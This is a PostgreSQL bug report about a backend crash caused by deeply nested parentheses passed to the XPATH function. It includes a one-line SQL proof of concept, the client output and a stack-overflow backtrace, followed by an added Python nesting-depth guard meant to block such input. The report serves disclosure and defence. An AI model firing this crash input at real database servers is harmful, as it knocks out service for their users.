BUG #18617: PostgreSQL Server Subprocess Crashes by the XPATH Function Expression with Crafted Arguments - Mailing list pgsql-bugs

From PG Bug reporting form
Subject BUG #18617: PostgreSQL Server Subprocess Crashes by the XPATH Function Expression with Crafted Arguments
Date
Msg-id 18617-1cee4d2ed1f4e7ae@postgresql.org
Responses Re: BUG #18617: PostgreSQL Server Subprocess Crashes by the XPATH Function Expression with Crafted Arguments
Re: BUG #18617: PostgreSQL Server Subprocess Crashes by the XPATH Function Expression with Crafted Arguments
List pgsql-bugs
The following bug has been logged on the website:

Bug reference:      18617
Logged by:          Jingzhou Fu
Email address:      fuboat@outlook.com
PostgreSQL version: 17rc1
Operating system:   Ubuntu 20.04 with docker image 'postgres:17rc1'
Description:

A PostgreSQL server 17rc1 subprocess crashes on an XPATH function expression
with crafted arguments. The main process is not affected.

PoC:
```
SELECT XPATH(REPEAT('(', 100000), '<root/>');
```

Client Output:
```
psql (17rc1 (Debian 17~rc1-1.pgdg120+1))
Type "help" for help.
postgres=# SELECT XPATH(REPEAT('(', 100000), '<root/>');
server closed the connection unexpectedly
        This probably means the server terminated abnormally
        before or while processing the request.
The connection to the server was lost. Attempting reset: Failed.
```

GDB backtrace (it seems to be a stack overflow):
```
#0  0x00007a66b81a74b2 in ?? () from
target:/lib/x86_64-linux-gnu/libxml2.so.2
#1  0x00007a66b81a86d6 in ?? () from
target:/lib/x86_64-linux-gnu/libxml2.so.2
#2  0x00007a66b81a908d in ?? () from
target:/lib/x86_64-linux-gnu/libxml2.so.2
...
#120767 0x00007a66b81a908d in ?? () from
target:/lib/x86_64-linux-gnu/libxml2.so.2
#120768 0x00007a66b81af062 in xmlXPathCompile () from
target:/lib/x86_64-linux-gnu/libxml2.so.2
#120769 0x00005a0ebb12c131 in ?? ()
#120770 0x00005a0ebb12cd4e in xpath ()
#120771 0x00005a0ebae4c67a in ?? ()
#120772 0x00005a0ebae7f6b3 in ?? ()
#120773 0x00005a0ebae50145 in standard_ExecutorRun ()
#120774 0x00005a0ebae5f2fd in fmgr_sql ()
#120775 0x00005a0ebae4c67a in ?? ()
#120776 0x00005a0ebaf46efc in evaluate_expr ()
#120777 0x00005a0ebaf47140 in ?? ()
#120778 0x00005a0ebaf480fd in ?? ()
#120779 0x00005a0ebaebe58b in expression_tree_mutator_impl ()
#120780 0x00005a0ebaebe495 in expression_tree_mutator_impl ()
#120781 0x00005a0ebaf48fc7 in eval_const_expressions ()
#120782 0x00005a0ebaf2c953 in ?? ()
#120783 0x00005a0ebaf34b02 in subquery_planner ()
#120784 0x00005a0ebaf35459 in standard_planner ()
#120785 0x00005a0ebb001440 in pg_plan_query ()
#120786 0x00005a0ebb001532 in pg_plan_queries ()
#120787 0x00005a0ebb001806 in ?? ()
#120788 0x00005a0ebb0033ee in PostgresMain ()
#120789 0x00005a0ebaffde7f in BackendMain ()
#120790 0x00005a0ebaf6bf2a in postmaster_child_launch ()
#120791 0x00005a0ebaf6fa39 in ?? ()
#120792 0x00005a0ebaf71958 in PostmasterMain ()
#120793 0x00005a0ebac96476 in main ()
```
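The backtrace shows libxml2's xmlXPathCompile() recursing once per nested `(` until the backend's stack is exhausted. Application code that forwards user-supplied XPath text to xpath() (or straight to libxml2) can refuse pathological nesting before the compiler ever sees it. The following depth guard is an added example, not code from the report or from PostgreSQL; MAX_DEPTH is an assumed, deliberately conservative limit, and the sample inputs are constructed.

```python
"""Nesting-depth guard for XPath 1.0 expressions (added example, not PostgreSQL code).

xmlXPathCompile() descends one stack frame per nested '(' or '[', so an
expression with tens of thousands of opening parentheses exhausts the stack
of whatever process compiles it.  Bounding the depth up front, and rejecting
unbalanced input outright, keeps such text out of the compiler.
"""

MAX_DEPTH = 64  # assumed limit; legitimate XPath rarely nests more than a few levels

OPEN_TO_CLOSE = {"(": ")", "[": "]"}


def xpath_nesting_depth(expr: str) -> int:
    """Return the maximum nesting depth of ( ) and [ ] in an XPath 1.0 expression.

    Brackets inside string literals ('...' or "...") are ignored; XPath 1.0
    literals have no escape sequences, so a literal simply runs to the next
    matching quote.  Mismatched or unclosed brackets raise ValueError so the
    caller treats the expression as invalid instead of passing it on.
    """
    depth = 0
    max_depth = 0
    stack = []   # expected closing characters, innermost last
    quote = None  # quote character of the literal we are inside, if any
    for ch in expr:
        if quote:
            if ch == quote:
                quote = None
            continue
        if ch in ("'", '"'):
            quote = ch
        elif ch in OPEN_TO_CLOSE:
            stack.append(OPEN_TO_CLOSE[ch])
            depth += 1
            max_depth = max(max_depth, depth)
        elif ch in (")", "]"):
            if not stack or stack.pop() != ch:
                raise ValueError("mismatched bracket in XPath expression")
            depth -= 1
    if quote is not None:
        raise ValueError("unterminated string literal in XPath expression")
    if stack:
        raise ValueError("unclosed bracket in XPath expression")
    return max_depth


def check_xpath(expr: str, limit: int = MAX_DEPTH) -> bool:
    """True if expr may be handed to the XPath compiler, False if it must be refused."""
    try:
        return xpath_nesting_depth(expr) <= limit
    except ValueError:
        return False


if __name__ == "__main__":
    # Constructed inputs: an ordinary predicate, a literal that contains '(',
    # and the shape of the report's argument (100000 unbalanced parentheses).
    samples = [
        "/root/item[@id='(x)']",
        "count(//a[starts-with(@href, '(')])",
        "(" * 100000,
    ]
    for sample in samples:
        print(repr(sample[:40]), check_xpath(sample))
```

The guard is cheap (one linear pass, no recursion) and is meant to sit in front of the call that builds the xpath() argument; it does not replace the server-side fix, it only keeps untrusted expressions of this shape from reaching the compiler.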
